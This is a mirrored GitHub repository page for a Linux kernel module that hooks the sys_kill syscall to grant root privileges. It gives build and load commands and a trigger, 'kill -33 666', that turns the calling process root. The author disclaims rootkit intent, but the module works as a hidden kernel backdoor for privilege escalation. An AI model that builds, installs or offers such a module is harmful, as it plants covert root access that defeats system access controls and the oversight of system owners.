Sargastico / LKM-Kill-SysCallHook

LKM (linux kernel module) to hook "sys_kill" syscall and get root privileges. Tested on Linux debian 4.19.0-16-amd64 (This is not a rootkit prototype).

Geek Repo

Github PK Tool

LKM-Kill-SysCallHook

LKM (linux kernel module) to hook syscall functions

Build the .ko (kernel object):

git clone https://github.com/Sargastico/LKM-Kill-SysCallHook.git && cd LKM-Kill-SysCallHook && make

Load the kernel module:

sudo insmod main.ko

Check the kernel log for lkm output:

sudo tail -f /var/log/kern.log

Get root by sending a "kill" command with a 33 "sig" to 666 "pid":

kill -33 666

About

LKM (linux kernel module) to hook "sys_kill" syscall and get root privileges. Tested on Linux debian 4.19.0-16-amd64 (This is not a rootkit prototype).

Languages

Language:C 96.5%Language:Makefile 3.5%